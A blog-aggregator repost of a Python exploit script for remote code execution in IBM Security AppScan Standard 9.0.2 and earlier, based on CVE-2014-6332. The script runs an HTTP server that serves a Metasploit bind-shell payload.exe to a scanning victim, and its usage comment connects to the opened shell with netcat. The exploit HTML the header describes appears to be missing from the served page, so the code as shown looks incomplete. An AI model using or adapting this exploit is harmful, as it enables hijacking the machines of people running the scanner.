IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
  • 登录 注册

    IBM Security AppScan Standard OLE Automation Array Remote Code Execution

    没穿底裤发表于 2015-06-14 18:54:59
    love 0

    #!/usr/bin/python
    
    import BaseHTTPServer, socket
    
    ##
    # IBM Security AppScan Standard OLE Automation Array Remote Code Execution
    #
    # Author: Naser Farhadi
    # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
    #
    # Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7
    #
    # Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ 
    # if you able to exploit IE then you can exploit appscan and acunetix ;)
    # This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And
    # Metasploit windows/shell_bind_tcp Executable Payload
    #
    # Usage:
    #       chmod +x appscan.py
    #       ./appscan.py
    #       ...
    #       nc 172.20.10.14 333
    #
    # Video: http://youtu.be/hPs1zQaBLMU
    ##
    
    class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
        def do_GET(req):
            req.send_response(200)
            if req.path == "/payload.exe":
                req.send_header('Content-type', 'application/exe')
                req.end_headers()
                exe = open("payload.exe", 'rb')
                req.wfile.write(exe.read())
                exe.close()
            else:
                req.send_header('Content-type', 'text/html')
                req.end_headers()
                req.wfile.write("""Please scan me!
                                """)
    
    if __name__ == '__main__':
        sclass = BaseHTTPServer.HTTPServer
        server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
        print "Http server started", socket.gethostbyname(socket.gethostname()), 80
        try:
            server.serve_forever()
        except KeyboardInterrupt:
            pass
        server.server_close()



沪ICP备19023445号-2号
友情链接